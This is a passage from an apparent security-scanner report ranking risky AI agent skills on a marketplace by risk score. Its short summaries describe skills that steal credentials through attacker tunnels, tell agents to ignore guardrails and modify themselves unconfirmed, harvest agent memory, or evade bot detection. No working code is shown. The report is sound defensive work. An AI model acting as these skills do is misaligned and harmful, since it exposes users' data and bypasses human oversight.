Instructs the AI agent to autonomously self-register on a third-party cloud service (Subfeed), create AI entities, and then onboard the human user by collecting their email and creating an account on their behalf — all with minimal upfront user conse…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
136. 🚨 agent-telegram by shangchuanqiytu-ui
| Risk: 82% ████████░░ | Downloads: 527 |
定义一套 AI Agent 团队(架构师、后端、前端、产品等角色)通过 Telegram 向特定用户汇报工作进度的通信规范,要求所有 Agent 在任务各阶段调用
message工具向硬编码的 Telegram ID 发送状态消息。
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
137. 🚨 depguard by suhteevah
| Risk: 76% ████████░░ | Downloads: 525 |
A commercial dependency audit skill that wraps native package manager tools (npm audit, pip-audit, cargo audit, etc.) to scan for vulnerabilities and license issues. Free tier offers one-shot scanning; paid tiers ($19-$59/month) add git hooks, auto-f…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Base64 Encoded Payload[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
138. 🚨 crypto-portfolio-tracker-api by strykragent
| Risk: 74% ███████░░░ | Downloads: 523 |
A Node.js npm package and CLI tool for tracking cryptocurrency portfolio value and P&L by fetching real-time prices from the third-party Strykr Prism API (prismapi.ai).
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
139. 🚨 ai-hunter-pro by traprapitalianazional-dev
| Risk: 85% ████████░░ | Downloads: 518 |
一个声称能自动抓取 TechCrunch 科技新闻、调用 AI 生成社交媒体文案并自动发布到 X (Twitter) 的自动化流水线技能,默认模拟真实 KOL「Yusef the Tool Hunter」的人设风格。
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
140. 🚨 glowskin-promo by underbench2-gif
| Risk: 72% ███████░░░ | Downloads: 506 |
A marketing content generation skill for skincare affiliate promotions, providing TikTok hooks, Instagram captions, story ideas, and CTAs to drive affiliate sales.
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
141. 🚨 amazon-to-shopify-sync by walynlee
| Risk: 93% █████████░ | Downloads: 289 |
声称是一个将亚马逊商品数据同步到Shopify的通用引擎,但实际代码是针对特定商品(ASIN B0FHPZRLJK)的硬编码脚本,包含明文API密钥,且核心同步逻辑无法正常运行。
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
142. 🚨 feishu-group-ops by vinzeny
| Risk: 80% ████████░░ | Downloads: 169 |
A Feishu (Lark) group management skill for the OpenClaw platform that allows natural language management of group chats (add/remove members, list groups, send messages, rename/create groups) via a Python CLI script, with per-write-operation billing t…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
143. 🚨 Reddit VOC Lobster Pro by unknown
| Risk: 94% █████████░ | Downloads: 0 |
该 skill 声称是一个 Reddit 消费者调研引擎,能自动抓取 Reddit 数据、同步至飞书多维表,并将报告发布至 Cloudflare Pages。但实际代码中的数据抓取和飞书写入均为伪造操作,且包含硬编码的真实 API 凭证。
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
144. 🚨 Agentok Skill by unknown
| Risk: 92% █████████░ | Downloads: 0 |
该技能声称为AI代理提供一个名为AgentTok的TikTok式视频分享平台,自动注册账号、生成介绍视频并上传。实际上,脚本将凭证和数据发送至攻击者控制的Cloudflare临时隧道(非官方域名),并在本地以明文形式保存敏感凭证,构成凭证窃取和数据渗漏攻击。
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
145. 🚨 openguardrails by thomas-security
| Risk: 91% █████████░ | Downloads: 0 |
A claimed prompt-injection detection plugin for OpenClaw that intercepts tool results (emails, files, web pages) and analyzes them via an external LLM API, while also bundling an unrelated ‘MoltGuard’ product identity. In practice, it sends all inter…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]SSH Key Access[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
146. 🚨 self-evolve by be1human
| Risk: 90% █████████░ | Downloads: 0 |
Instructs an AI agent to autonomously modify its own configuration, skills, and workspace files without user confirmation, and to ignore safety guardrails by reframing them as unnecessary obstacles.
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
147. 🚨 xurl by unknown
| Risk: 88% █████████░ | Downloads: 0 |
A proposed skill for analyzing Twitter content to identify and target WordPress and Shopify clients for lead generation and content intelligence purposes.
Threats detected:
[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
148. 🚨 linkedin by biostartechnology
| Risk: 87% █████████░ | Downloads: 0 |
Provide instructions for automating LinkedIn interactions (messaging, profile viewing, connections) using browser automation via Chrome extension relay, isolated browser session, or session cookies
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
149. 🚨 moltguard by thomas-security
| Risk: 87% █████████░ | Downloads: 0 |
Purports to be a Claude Code skill that installs MoltGuard, an OpenClaw security guard providing prompt injection detection and data exfiltration protection. However, the skill is actually OpenClaw plugin documentation with no actual Claude Code inte…
Threats detected:
[HIGH]SSH Key Access[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
150. 🚨 Memory Mesh Core by unknown
| Risk: 87% █████████░ | Downloads: 0 |
A so-called ‘memory management’ skill that harvests local agent memory files, scores and promotes them, then exports and auto-posts the content to a public GitHub issue while embedding viral spread mechanics (install/star/recommend-to-peers CTAs) and…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]Private Key Extraction[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
151. 🚨 antigravity-image-gen by unknown
| Risk: 87% █████████░ | Downloads: 0 |
Claims to generate images using an internal Google Antigravity API (Gemini 3 Pro Image) by reading local OAuth credentials and making direct API calls to a sandbox endpoint.
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
152. 🚨 Auto Skill Hunter by unknown
| Risk: 85% ████████░░ | Downloads: 0 |
A Node.js automation script that mines user session JSONL files and task memory for unresolved problems, queries ClawHub APIs for candidate skills, scores them via multi-factor ranking, then clones and executes the top candidates — effectively auto-e…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
153. 🚨 EZCTO Smart Web Reader by unknown
| Risk: 85% ████████░░ | Downloads: 0 |
An OpenClaw-native skill that automatically intercepts all agent URL accesses, checks a third-party cache API (api.ezcto.fun), fetches and parses HTML with an LLM, and returns structured JSON — designed to operate ‘transparently’ without user awarene…
Threats detected:
[CRITICAL]Remote Script Execution[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
154. 🚨 360-search by unknown
| Risk: 85% ████████░░ | Downloads: 0 |
Automated web scraping client for the 360.com Chinese search engine, providing methods to search for web results, news, and images using Playwright browser automation
Threats detected:
[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
155. 🚨 agentconnex-register by anshkohli88
| Risk: 85% ████████░░ | Downloads: 0 |
Auto-registers ‘OpenClaw’ agents on agentconnex.com by reading workspace files (SOUL.md, IDENTITY.md, AGENTS.md) and POSTing agent profile data to a third-party external service, with a zero-config auto-boot mechanism that installs itself to run on e…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
156. 🚨 9ma-mata-human by unknown
| Risk: 84% ████████░░ | Downloads: 0 |
A skill designed to generate AI-synthesized human avatar videos lip-synced to user-provided text by downloading and executing platform-specific binary executables from a remote server
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
157. 🚨 12306-conflict by unknown
| Risk: 82% ████████░░ | Downloads: 0 |
A Playwright-based automation client for China’s 12306 railway ticket booking website, providing login, ticket search, and (claimed but unimplemented) ticket purchasing functionality.
Threats detected:
[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
158. 🚨 wechat-mp-cn by unknown
| Risk: 82% ████████░░ | Downloads: 0 |
Documentation and guidance for monitoring WeChat Official Accounts through third-party tools and manual methods, presented as if it were a functional skill
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
159. 🚨 blogburst by shensi8312
| Risk: 82% ████████░░ | Downloads: 0 |
A Claude Code skill that acts as an autonomous AI marketing agent, making API calls to blogburst.ai to generate content, auto-post to social platforms, auto-engage (reply/like/follow), run SEO/GEO audits, scan communities for promotional opportunitie…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[HIGH]Shell RC Modification[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
160. 🚨 ai-web-automation by arthasking123
| Risk: 80% ████████░░ | Downloads: 0 |
Provides web scraping functionality via a simple Python script that downloads HTML and extracts basic metadata (page title and links). Claims to offer a comprehensive ‘Web Automation Service’ with form filling, automated testing, scheduled tasks, and…
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
161. 🚨 xiaoai-bridge by unknown
| Risk: 80% ████████░░ | Downloads: 0 |
通过轮询小米云端 API 监听小爱音箱语音消息,过滤触发词后以 JSON 格式输出,并支持通过 TTS 向小爱音箱播报文本,实现语音指令桥接功能。
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
162. 🚨 vibe-harvester by anotherj1
| Risk: 78% ████████░░ | Downloads: 0 |
一个旨在自动化浏览瀑布流网站(如小红书、Pinterest)、通过视觉大模型筛选符合用户审美偏好的图片,并自动下载保存到本地目录的技能。
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
163. 🚨 stealthy-auto-browse by psyb0t
| Risk: 78% ████████░░ | Downloads: 0 |
A Docker-based stealth browser automation skill using Camoufox (Firefox fork) with OS-level PyAutoGUI input to bypass Cloudflare, DataDome, PerimeterX, and other bot-detection systems via an HTTP JSON API.
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection
164. 🚨 deploy-agent by unknown
| Risk: 78% ████████░░ | Downloads: 0 |
A multi-step deployment workflow manager for full-stack apps targeting GitHub + Cloudflare Pages, with persistent state and human approval gates at each stage. The bash script manages deployment lifecycle via JSON state files.
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
165. 🚨 Arxiv Skill Learning by unknown
| Risk: 78% ████████░░ | Downloads: 0 |
该技能从 arXiv 论文中自动学习并提取技能代码,通过抓取论文、调用外部提取器生成技能、运行冒烟测试,并将已学习论文记录到本地 JSON 数据库以避免重复处理。
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
166. 🚨 game-cog by nitishgargiitd
| Risk: 78% ████████░░ | Downloads: 0 |
A documentation-only guide skill that instructs users to install and use an external ‘cellcog’ service for game asset generation (sprites, tilesets, music, GDDs, 3D models). Contains no executable implementation — purely marketing copy and example pr…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
167. 🚨 dygod-movies by anlinxi
| Risk: 78% ████████░░ | Downloads: 0 |
爬取电影天堂(dygod.net)的电影/电视剧信息,展示最新更新和高分影视,并通过群晖NAS的DownloadStation下载磁力/FTP链接资源
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
168. 🚨 browser by unknown
| Risk: 78% ████████░░ | Downloads: 0 |
Renders JavaScript-heavy web pages using Puppeteer and extracts their text content to overcome HTTP client limitations
Threats detected:
[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
169. 🚨 Planet Express Marketplace by unknown
| Risk: 74% ███████░░░ | Downloads: 0 |
This skill is documentation/API guide for a blockchain-based file marketplace (Planet Express) built on Monad, enabling users to buy/sell encrypted files via the x402 HTTP payment protocol using MON, SOL, or USDC, with fees partially routing to a $FA…
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
170. 🚨 vdoob by unknown
| Risk: 72% ███████░░░ | Downloads: 0 |
该技能将 Claude AI 接入 vdoob.com 平台,让 AI 代理自动回答用户问题以赚取虚拟货币(’饵’),包括定时任务自动拉取问题并提交答案、本地存储思维模式、以及市场/社交等附加功能。
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
171. 🚨 document-parser by ankylala
| Risk: 72% ███████░░░ | Downloads: 0 |
通过调用外部第三方 HTTP API(固定IP:47.111.146.164)解析 PDF、图片和 Word 文档,提取结构化数据,以命令行工具形式运行。
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]Outbound Data Transfer[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection
172. 🚨 neural-memory by nhadaututtheky
| Risk: 72% ███████░░░ | Downloads: 0 |
A Claude Code plugin that provides persistent, associative memory for AI agents using a neural graph architecture with spreading activation recall. Includes an MCP server (45 tools), three lifecycle hooks (PreCompact/Stop/PostToolUse), and three work…
Threats detected:
[HIGH]Dynamic Code Evaluation[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
173. 🚨 github-to-clawhub by antonia-sz
| Risk: 71% ███████░░░ | Downloads: 0 |
将任意 GitHub 开源项目自动转化为 OpenClaw skill 并发布到 clawhub.com 的 7 步流程助手,涵盖 README 抓取、查重、SKILL.md 生成、本地目录创建和 clawhub CLI 发布。
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]LLM Semantic Detection[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
174. 🚨 jd-interview-prep by antonia-sz
| Risk: 66% ███████░░░ | Downloads: 0 |
接收用户粘贴或上传的岗位描述(JD)和个人简历,通过调用 LLM API(DeepSeek/OpenAI 兼容接口)生成匹配度分析、15 道分类面试题(含 STAR 框架)及备考建议,并可将报告导出为 Markdown 文件。
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
175. 🚨 mcporter by unknown
| Risk: 63% ██████░░░░ | Downloads: 0 |
Reference documentation for the mcporter CLI tool, which provides command-line access to list, configure, authenticate, and call MCP (Model Context Protocol) servers and their tools via HTTP or stdio interfaces.
Threats detected:
[CRITICAL]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
176. 🚨 Tencent Cloud Lighthouse by unknown
| Risk: 63% ██████░░░░ | Downloads: 0 |
通过 mcporter + lighthouse-mcp-server 管理腾讯云轻量应用服务器,提供自动化安装配置、实例管理、监控告警、防火墙管理和远程命令执行功能
Threats detected:
[HIGH]Dynamic Code Evaluation[CRITICAL]Environment Variable Exfiltration[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection[HIGH]LLM Semantic Detection
Most Common Threat Types
| Threat | Count |
|---|---|
| LLM Semantic Detection | 1561 |
| Dynamic Code Evaluation | 165 |
| Startup Failure (non-executable) | 151 |
| Outbound Data Transfer | 86 |
| Hidden Command Execution | 33 |
| Private Key Extraction | 23 |
| Environment Variable Exfiltration | 18 |
| Base64 Encoded Payload | 10 |
| SSH Key Access | 6 |
| Remote Script Execution | 6 |
ClawSec | ClawSearch | npx clawsearch-guard <skill>